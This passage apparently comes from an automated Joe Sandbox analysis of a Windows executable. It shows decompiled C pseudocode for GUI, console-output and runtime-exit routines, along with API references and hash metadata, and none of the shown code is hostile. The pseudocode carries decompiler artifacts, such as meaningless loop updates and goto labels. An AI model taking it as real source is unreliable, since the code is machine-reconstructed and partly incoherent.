                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  						goto L49;
                                                  						L19:
                                                  						_t267 =  *((intOrPtr*)(_t250 + _t186 + 0x2d));
                                                  						__eflags = _t267 & 0x00000004;
                                                  						if((_t267 & 0x00000004) == 0) {
                                                  							_v33 =  *_t277;
                                                  							_t188 = E0040F703(_t267);
                                                  							_t251 = _v33 & 0x000000ff;
                                                  							__eflags =  *((intOrPtr*)(_t188 + _t251 * 2)) - _t242;
                                                  							if( *((intOrPtr*)(_t188 + _t251 * 2)) >= _t242) {
                                                  								_push(1);
                                                  								_push(_t277);
                                                  								goto L26;
                                                  							} else {
                                                  								_t100 =  &(_t277[1]); // 0x1
                                                  								_t202 = _t100;
                                                  								_v56 = _t202;
                                                  								__eflags = _t202 - _v96;
                                                  								if(_t202 >= _v96) {
                                                  									_t274 = _v80;
                                                  									_t253 = _v44;
                                                  									 *((char*)(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2e)) = _v33;
                                                  									 *(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2d) =  *(_t253 +  *((intOrPtr*)(0x4217e8 + _t274 * 4)) + 0x2d) | 0x00000004;
                                                  									_t286 = _t282 + 1;
                                                  									goto L41;
                                                  								} else {
                                                  									_t206 = E004134E3( &_v76, _t277, 2);
                                                  									_t296 = _t295 + 0xc;
                                                  									__eflags = _t206 - 0xffffffff;
                                                  									if(_t206 == 0xffffffff) {
                                                  										goto L48;
                                                  									} else {
                                                  										_t277 = _v56;
                                                  										goto L27;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							_v24 =  *((intOrPtr*)(_t250 + _t186 + 0x2e));
                                                  							_v23 =  *_t277;
                                                  							_push(2);
                                                  							 *(_t250 + _v48 + 0x2d) = _t267 & 0x000000fb;
                                                  							_push( &_v24);
                                                  							L26:
                                                  							_push( &_v76);
                                                  							_t190 = E004134E3();
                                                  							_t296 = _t295 + 0xc;
                                                  							__eflags = _t190 - 0xffffffff;
                                                  							if(_t190 == 0xffffffff) {
                                                  								goto L48;
                                                  							} else {
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  						goto L49;
                                                  					}
                                                  				}
                                                  				L49:
                                                  				if(__eflags != 0) {
                                                  					_t183 = _v72;
                                                  					_t165 = _t183 + 0x350;
                                                  					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
                                                  					__eflags =  *_t165;
                                                  				}
                                                  				__eflags = _v8 ^ _t294;
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				asm("movsd");
                                                  				return E0040AE5B(_v8 ^ _t294);
                                                  			}
                                                  0x004140b7
                                                  0x00414171
                                                  0x00414178
                                                  0x00414179
                                                  0x0041417c
                                                  0x0041417e
                                                  0x00414322
                                                  0x00414324
                                                  0x00000000
                                                  0x00414326
                                                  0x00414326
                                                  0x00414329
                                                  0x00414338
                                                  0x0041433c
                                                  0x0041433d
                                                  0x0041433d
                                                  0x00000000
                                                  0x00414341
                                                  0x00414184
                                                  0x00414186
                                                  0x0041418c
                                                  0x0041418f
                                                  0x0041419b
                                                  0x004141a4
                                                  0x004141af
                                                  0x004141b4
                                                  0x004141b7
                                                  0x004141ba
                                                  0x00000000
                                                  0x004141c0
                                                  0x004141c0
                                                  0x00000000
                                                  0x004141c0
                                                  0x004141ba
                                                  0x004140bd
                                                  0x004140cc
                                                  0x004140cd
                                                  0x004140d0
                                                  0x004140d3
                                                  0x004140d8
                                                  0x004142ee
                                                  0x004142f0
                                                  0x004142f2
                                                  0x004142f4
                                                  0x004142fe
                                                  0x00414306
                                                  0x00414308
                                                  0x00414309
                                                  0x0041430d
                                                  0x00414310
                                                  0x00414310
                                                  0x00414314
                                                  0x00414314
                                                  0x00414314
                                                  0x00414317
                                                  0x00414317
                                                  0x00414317
                                                  0x00414319
                                                  0x00414319
                                                  0x0041431d
                                                  0x004140de
                                                  0x004140de
                                                  0x004140e1
                                                  0x004140e3
                                                  0x004140e6
                                                  0x004140e9
                                                  0x004140ed
                                                  0x004140ee
                                                  0x004140f2
                                                  0x004140f5
                                                  0x004140fa
                                                  0x00414104
                                                  0x00414109
                                                  0x0041410c
                                                  0x0041410f
                                                  0x0041410f
                                                  0x00414112
                                                  0x00414115
                                                  0x00414117
                                                  0x00414120
                                                  0x00414124
                                                  0x00414125
                                                  0x00414129
                                                  0x0041412f
                                                  0x00414138
                                                  0x00414145
                                                  0x0041414c
                                                  0x00414150
                                                  0x0041415b
                                                  0x00414160
                                                  0x00414166
                                                  0x00000000
                                                  0x0041416c
                                                  0x004141c3
                                                  0x004141c4
                                                  0x00414247
                                                  0x0041424e
                                                  0x00414256
                                                  0x0041425e
                                                  0x00414263
                                                  0x00414266
                                                  0x0041426b
                                                  0x00000000
                                                  0x00414271
                                                  0x00414286
                                                  0x00414366
                                                  0x0041436c
                                                  0x00000000
                                                  0x0041428c
                                                  0x00414295
                                                  0x00414297
                                                  0x0041429d
                                                  0x00000000
                                                  0x004142a3
                                                  0x004142a7
                                                  0x004142dd
                                                  0x004142e0
                                                  0x00000000
                                                  0x004142e6
                                                  0x004142e6
                                                  0x00000000
                                                  0x004142e6
                                                  0x004142a9
                                                  0x004142ab
                                                  0x004142ad
                                                  0x004142c6
                                                  0x00000000
                                                  0x004142cc
                                                  0x004142d0
                                                  0x00000000
                                                  0x004142d6
                                                  0x004142d6
                                                  0x004142d9
                                                  0x004142da
                                                  0x00000000
                                                  0x004142da
                                                  0x004142d0
                                                  0x004142c6
                                                  0x004142a7
                                                  0x0041429d
                                                  0x00414286
                                                  0x0041426b
                                                  0x00414166
                                                  0x004140d8
                                                  0x00000000
                                                  0x004141c8
                                                  0x004141c8
                                                  0x004141cc
                                                  0x004141cf
                                                  0x004141f1
                                                  0x004141f4
                                                  0x004141f9
                                                  0x004141fd
                                                  0x00414201
                                                  0x0041422f
                                                  0x00414231
                                                  0x00000000
                                                  0x00414203
                                                  0x00414203
                                                  0x00414203
                                                  0x00414206
                                                  0x00414209
                                                  0x0041420c
                                                  0x00414343
                                                  0x00414346
                                                  0x00414353
                                                  0x0041435e
                                                  0x00414363
                                                  0x00000000
                                                  0x00414212
                                                  0x00414219
                                                  0x0041421e
                                                  0x00414221
                                                  0x00414224
                                                  0x00000000
                                                  0x0041422a
                                                  0x0041422a
                                                  0x00000000
                                                  0x0041422a
                                                  0x00414224
                                                  0x0041420c
                                                  0x004141d1
                                                  0x004141d8
                                                  0x004141dd
                                                  0x004141e3
                                                  0x004141e5
                                                  0x004141ec
                                                  0x00414232
                                                  0x00414235
                                                  0x00414236
                                                  0x0041423b
                                                  0x0041423e
                                                  0x00414241
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00414241
                                                  0x00000000
                                                  0x004141cf
                                                  0x0041406a
                                                  0x00414372
                                                  0x00414372
                                                  0x00414374
                                                  0x00414377
                                                  0x00414377
                                                  0x00414377
                                                  0x00414377
                                                  0x00414389
                                                  0x0041438b
                                                  0x0041438c
                                                  0x0041438d
                                                  0x00414397

                                                  APIs
                                                  • GetConsoleOutputCP.KERNEL32(?,?,?), ref: 00414034
                                                  • __fassign.LIBCMT ref: 00414219
                                                  • __fassign.LIBCMT ref: 00414236
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041427E
                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004142BE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00414366
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 1735259414-0
                                                  • Opcode ID: 25405ef999baf99d50db2f777076ebd4317aa924b0d595818e575518d3e67d54
                                                  • Instruction ID: fb13085fe9f39d027224596580d8d7178c33383806ac5e50505dbf5f7aba09fc
                                                  • Opcode Fuzzy Hash: 25405ef999baf99d50db2f777076ebd4317aa924b0d595818e575518d3e67d54
                                                  • Instruction Fuzzy Hash: 92C19D75E002589FCB11CFE9C8809EDBBB5BF88314F28416AE865B7341D6359E82CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00406E10(signed int _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				intOrPtr _t96;
                                                  				void* _t104;
                                                  				struct HBITMAP__* _t114;
                                                  				signed int _t160;
                                                  				signed int _t172;
                                                  
                                                  				_t2 = _a4 + 8; // 0x84918b08
                                                  				_v20 =  *((intOrPtr*)( *_t2 + 0x14));
                                                  				_t6 = _a4 + 8; // 0x84918b08
                                                  				if( *((intOrPtr*)( *_t6 + 0x18)) != 0 &&  *((intOrPtr*)(_a4 + 0xa8)) == GetFocus()) {
                                                  					DestroyCaret();
                                                  				}
                                                  				_t11 = _a4 + 0x84; // 0x8458b00
                                                  				if( *((intOrPtr*)( *_t11 + 0x10)) != 0) {
                                                  					_t14 = _a4 + 0x84; // 0x8458b00
                                                  					DeleteObject( *( *_t14 + 0x10));
                                                  				}
                                                  				_t17 = _a4 + 0x84; // 0x8458b00
                                                  				_t96 =  *_t17;
                                                  				 *((intOrPtr*)(_t96 + 0x10)) = 0;
                                                  				_t20 = _a4 + 0x84; // 0x8458b00
                                                  				_t160 =  *_t20;
                                                  				 *((intOrPtr*)(_t160 + 0x44)) = 0;
                                                  				if(_v20 != 0x64) {
                                                  					_t24 = _a4 + 8; // 0x84918b08
                                                  					asm("cdq");
                                                  					_v24 = ( *((short*)( *_t24 + 0x80)) + 0x0000000f & 0xfffffff0) + (_t160 & 0x00000007) >> 3;
                                                  					_t28 = _a4 + 8; // 0x84918b08
                                                  					_push( *((short*)( *_t28 + 0x82)));
                                                  					_push(_v24);
                                                  					_t104 = E0040DBE0();
                                                  					_v16 = _t104;
                                                  					if(_v16 != 0) {
                                                  						_t34 = _a4 + 8; // 0x84918b08
                                                  						asm("cdq");
                                                  						if( *( *_t34 + 0x82) * _v20 / 0x64 <= 1) {
                                                  							_v28 = 1;
                                                  						} else {
                                                  							_t42 = _a4 + 8; // 0x84918b08
                                                  							asm("cdq");
                                                  							_v28 =  *( *_t42 + 0x82) * _v20 / 0x64;
                                                  						}
                                                  						_v32 = _v28;
                                                  						_t54 = _a4 + 8; // 0x84918b08
                                                  						_v12 =  *((short*)( *_t54 + 0x82)) - _v32;
                                                  						while(1) {
                                                  							_t61 = _a4 + 8; // 0x84918b08
                                                  							if(_v12 >=  *((short*)( *_t61 + 0x82))) {
                                                  								break;
                                                  							}
                                                  							_v8 = 0;
                                                  							while(1) {
                                                  								_t172 = _a4;
                                                  								_t68 = _t172 + 8; // 0x84918b08
                                                  								if(_v8 >=  *((short*)( *_t68 + 0x80))) {
                                                  									break;
                                                  								}
                                                  								asm("cdq");
                                                  								asm("cdq");
                                                  								 *((char*)(_v16 + (_v8 + (0x00000080 >> (_v8 & 0x00000007) & 0x00000007) >> 3) + _v24 * _v12)) =  *(_v16 + _v24 * _v12 + (_v8 + (_t172 & 0x00000007) >> 3)) & 0x000000ff | 0x00000080;
                                                  								_v8 = _v8 + 1;
                                                  							}
                                                  							_v12 = _v12 + 1;
                                                  						}
                                                  						_t84 = _a4 + 8; // 0x84918b08
                                                  						_t87 = _a4 + 8; // 0x84918b08
                                                  						_t114 = CreateBitmap( *( *_t87 + 0x80),  *( *_t84 + 0x82), 1, 1, _v16);
                                                  						_t90 = _a4 + 0x84; // 0x8458b00
                                                  						 *( *_t90 + 0x10) = _t114;
                                                  						return E0040DBEB(_v16);
                                                  					}
                                                  					return _t104;
                                                  				}
                                                  				return _t96;
                                                  			}

                                                  APIs
                                                  • GetFocus.USER32 ref: 00406E2F
                                                  • DestroyCaret.USER32 ref: 00406E40
                                                  • DeleteObject.GDI32(?), ref: 00406E62
                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00406FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                                                  • String ID: d
                                                  • API String ID: 3626877506-2564639436
                                                  • Opcode ID: b2c964a1f336987434e70822cbb2000099c62b175b4f16e4d8e5690cf225b524
                                                  • Instruction ID: f3b0e88e258c3ba16a5b386cc27445d0d3e048a8a080287da44ff0a5399481c1
                                                  • Opcode Fuzzy Hash: b2c964a1f336987434e70822cbb2000099c62b175b4f16e4d8e5690cf225b524
                                                  • Instruction Fuzzy Hash: 4F611D75900209DFCB04CF54C485BAEBBB2FF48315F19C1A9E849AB392D735EA91CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 25%
                                                  			E0040EDFD(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				_Unknown_base(*)()* _t8;
                                                  				_Unknown_base(*)()* _t14;
                                                  
                                                  				_v8 = _v8 & 0x00000000;
                                                  				_t8 =  &_v8;
                                                  				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
                                                  				if(_t8 != 0) {
                                                  					_t8 = GetProcAddress(_v8, "CorExitProcess");
                                                  					_t14 = _t8;
                                                  					if(_t14 != 0) {
                                                  						 *0x418394(_a4);
                                                  						_t8 =  *_t14();
                                                  					}
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					return FreeLibrary(_v8);
                                                  				}
                                                  				return _t8;
                                                  			}







                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0040EDAF,?,?,0040ED77,?,?,?), ref: 0040EE12
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EE25
                                                  • FreeLibrary.KERNEL32(00000000,?,?,0040EDAF,?,?,0040ED77,?,?,?), ref: 0040EE48
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: bbd30e8b8cf8a5cd47f4ceeb6b3101d77334138cccdf8063deda0b1ef6d57fbc
                                                  • Instruction ID: f9a97e0cc1c76dff18401fd2cff20c733dd3737fcdeed8b9e72a43a5dc25c969
                                                  • Opcode Fuzzy Hash: bbd30e8b8cf8a5cd47f4ceeb6b3101d77334138cccdf8063deda0b1ef6d57fbc
                                                  • Instruction Fuzzy Hash: D5F08231A0021CFBDB119B61DD0ABDE7A69EB00B55F144079E804B11A0CF748E01DAD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406910(intOrPtr _a4, struct HMENU__* _a8) {
                                                  				int _v8;
                                                  				int _v12;
                                                  
                                                  				if( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x14)) == 0) {
                                                  					_v8 = 1;
                                                  				} else {
                                                  					_v8 = 0;
                                                  				}
                                                  				EnableMenuItem(_a8, 0x111, _v8);
                                                  				if(IsClipboardFormatAvailable(0xd) == 0) {
                                                  					_v12 = 1;
                                                  				} else {
                                                  					_v12 = 0;
                                                  				}
                                                  				EnableMenuItem(_a8, 0x112, _v12);
                                                  				EnableMenuItem(_a8, 0x114, 1);
                                                  				return EnableMenuItem(_a8, 0x115, 1);
                                                  			}






                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: EnableItemMenu$AvailableClipboardFormat
                                                  • String ID:
                                                  • API String ID: 4217543366-0
                                                  • Opcode ID: 3b5aa6e1ea54b9d5e8ca5e38992b67e2cc9f60b476d73180d96e2bcaf08e59ae
                                                  • Instruction ID: d7f3310e07d9fe1f5a04116c0cd4b36c0b46aeef0aeba84d17812d40db3ce338
                                                  • Opcode Fuzzy Hash: 3b5aa6e1ea54b9d5e8ca5e38992b67e2cc9f60b476d73180d96e2bcaf08e59ae
                                                  • Instruction Fuzzy Hash: 8601487564020CFBEF04DF90DD8ABE97BB5AB44700F10C0A8FA015B2C0CBB59A54CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E004038D0(struct HDC__** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				intOrPtr _v16;
                                                  				unsigned int _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				struct HDC__** _t64;
                                                  				intOrPtr _t67;
                                                  
                                                  				_t64 = _a4;
                                                  				if( *((intOrPtr*)(_t64[0x21] + 8)) == 0) {
                                                  					L2:
                                                  					return _t64;
                                                  				}
                                                  				_t64 = _a4[0x21];
                                                  				if(_t64[1] != 0) {
                                                  					_t9 = _a8 + 8; // 0x54c18300
                                                  					_t11 =  *_t9 -  *_a8 + 2; // 0x54c18302
                                                  					_push( *_t9 -  *_a8 + _t11);
                                                  					_t67 = E0040DC06();
                                                  					_v16 = _t67;
                                                  					if(_v16 != 0) {
                                                  						_push(4 + ( *((intOrPtr*)(_a8 + 8)) -  *_a8) * 4);
                                                  						_v28 = E0040DC06();
                                                  						_v24 = SelectObject( *(_a4[0x21]), _a4[0x21][2]);
                                                  						_v12 =  *((intOrPtr*)(_a8 + 4));
                                                  						while(_v12 <=  *((intOrPtr*)(_a8 + 0xc))) {
                                                  							_v8 =  *_a8;
                                                  							while(_v8 <=  *((intOrPtr*)(_a8 + 8))) {
                                                  								SetBkColor( *(_a4[0x21]),  *(_a4[2] + 0x30 + (_v20 >> 0x00000004 & 0x0000000f) * 4));
                                                  								SetTextColor( *(_a4[0x21]),  *(_a4[2] + 0x30 + (_v20 & 0x0000000f) * 4));
                                                  								_v8 = _v32 - 1;
                                                  								_v8 = _v8 + 1;
                                                  							}
                                                  							_v12 = _v12 + 1;
                                                  						}
                                                  						SelectObject( *(_a4[0x21]), _v24);
                                                  						E0040DBEB(_v28);
                                                  						return E0040DBEB(_v16);
                                                  					}
                                                  					return _t67;
                                                  				}
                                                  				goto L2;
                                                  			}













                                                  APIs
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00403956
                                                  • SetBkColor.GDI32(?,?), ref: 004039BC
                                                  • SetTextColor.GDI32(?,?), ref: 004039DF
                                                  • SelectObject.GDI32(?,?), ref: 00403A05
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: ColorObjectSelect$Text
                                                  • String ID:
                                                  • API String ID: 2688426544-0
                                                  • Opcode ID: 5481c444f4b31c03f917671891e1c00a494a71ad5df8ccd1fa49698d10d69400
                                                  • Instruction ID: e658bcd669a8fa779878f85c121d58f6d205785bab194ac251bc5195afebe609
                                                  • Opcode Fuzzy Hash: 5481c444f4b31c03f917671891e1c00a494a71ad5df8ccd1fa49698d10d69400
                                                  • Instruction Fuzzy Hash: 7F410BB4A00109EFCB04DF58C584EAABBB5FF48314F14C2A9E9499B355D734EA81DF84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00404B80(void* _a8) {
                                                  				void* __edi;
                                                  				int _t48;
                                                  				int _t49;
                                                  				void* _t56;
                                                  
                                                  				memcpy(_a8, 0x418440, 0x10 << 2);
                                                  				E0040D210(0x418460, _a8 + 0x8c, 0, 0x40);
                                                  				 *((intOrPtr*)(_a8 + 0x48)) = 0x19;
                                                  				 *((intOrPtr*)(_a8 + 0x4c)) = 1;
                                                  				_t48 = _a8;
                                                  				 *((intOrPtr*)(_t48 + 0x84)) = 1;
                                                  				__imp__GetDpiForSystem();
                                                  				_t49 = MulDiv(0x10, _t48, 0x60);
                                                  				 *(_a8 + 0x44) = _t49;
                                                  				__imp__GetDpiForSystem();
                                                  				 *((intOrPtr*)(_a8 + 0x40)) = MulDiv(8, _t49, 0x60);
                                                  				 *((intOrPtr*)(_a8 + 0x88)) = 0x190;
                                                  				 *((intOrPtr*)(_a8 + 0x58)) = 0x32;
                                                  				 *((intOrPtr*)(_a8 + 0x5c)) = 0;
                                                  				 *((intOrPtr*)(_a8 + 0x60)) = 1;
                                                  				 *((intOrPtr*)(_a8 + 0x64)) = 0;
                                                  				 *((intOrPtr*)(_a8 + 0x54)) = 0xf5;
                                                  				 *((intOrPtr*)(_a8 + 0x68)) = 0;
                                                  				 *((intOrPtr*)(_a8 + 0x70)) = 0x96;
                                                  				 *((intOrPtr*)(_a8 + 0x6c)) = 0x50;
                                                  				 *((intOrPtr*)(_a8 + 0x50)) = 0xf;
                                                  				 *((intOrPtr*)(_a8 + 0x78)) = 0x19;
                                                  				 *((intOrPtr*)(_a8 + 0x74)) = 0x50;
                                                  				 *((short*)(_a8 + 0x7c)) = 0;
                                                  				_t56 = _a8;
                                                  				 *((short*)(_t56 + 0x7e)) = 0;
                                                  				 *((intOrPtr*)(_a8 + 0x80)) = 0;
                                                  				return _t56;
                                                  			}








                                                  APIs
                                                  • GetDpiForSystem.USER32 ref: 00404BCC
                                                  • MulDiv.KERNEL32(00000010,00000000), ref: 00404BD5
                                                  • GetDpiForSystem.USER32 ref: 00404BE3
                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 00404BEC
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: System
                                                  • String ID:
                                                  • API String ID: 3470857405-0
                                                  • Opcode ID: 897cdc8b763fd44bd7b96ab9875fb154abdd71092beed7a7b28d08a50e0c0050
                                                  • Instruction ID: f0acf98c86865db86a9f71af5c83849ed90eedc40a826ad8e7e8d7baa1f4ca9d
                                                  • Opcode Fuzzy Hash: 897cdc8b763fd44bd7b96ab9875fb154abdd71092beed7a7b28d08a50e0c0050
                                                  • Instruction Fuzzy Hash: 4B31B875600208AFE744DF55C458B9ABBA5FF48318F10C16AED288F392DBB6E945CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004086E0(struct HWND__* _a4, intOrPtr* _a8) {
                                                  				long _v8;
                                                  				struct HMENU__* _v12;
                                                  
                                                  				_v8 =  *_a8;
                                                  				SetWindowLongW(_a4, 0, _v8);
                                                  				 *((intOrPtr*)(_v8 + 0xa8)) = _a4;
                                                  				if( *((intOrPtr*)(_v8 + 0x84)) == 0) {
                                                  					L6:
                                                  					return 0;
                                                  				}
                                                  				_v12 = GetSystemMenu(_a4, 0);
                                                  				if(_v12 != 0) {
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)) = CreatePopupMenu();
                                                  					if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)) != 0) {
                                                  						E00403A30(_v12, 1);
                                                  						E00403A30( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)) + 0xc)), 0);
                                                  						 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x84)))) = CreateCompatibleDC(0);
                                                  						goto L6;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}






                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateLongPopupSystemWindow
                                                  • String ID:
                                                  • API String ID: 3388415271-0
                                                  • Opcode ID: dca88242fddbdf48c846c268c1d76f2600cf5fbe782be4423c19be9a9e5ae3a4
                                                  • Instruction ID: 44f0d46e658bae695b86acdfcec7de6bdc6530870d40d7b7efc513e87ad21389
                                                  • Opcode Fuzzy Hash: dca88242fddbdf48c846c268c1d76f2600cf5fbe782be4423c19be9a9e5ae3a4
                                                  • Instruction Fuzzy Hash: FB213D34640208EFC704DFA4C984B9ABBF1BB48301F24C6B9E945AB391DB35AE41DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00415536(void* _a4, long _a8, DWORD* _a12) {
                                                  				void* _t13;
                                                  
                                                  				_t13 = WriteConsoleW( *0x41fe80, _a4, _a8, _a12, 0);
                                                  				if(_t13 == 0 && GetLastError() == 6) {
                                                  					E0041551F();
                                                  					E004154E1();
                                                  					_t13 = WriteConsoleW( *0x41fe80, _a4, _a8, _a12, _t13);
                                                  				}
                                                  				return _t13;
                                                  			}





                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?), ref: 0041554D
                                                  • GetLastError.KERNEL32(?,00414F8E,?,00000001,?,?,?,004143C3,?,?,?,?,?,?,0041490F,00000000), ref: 00415559
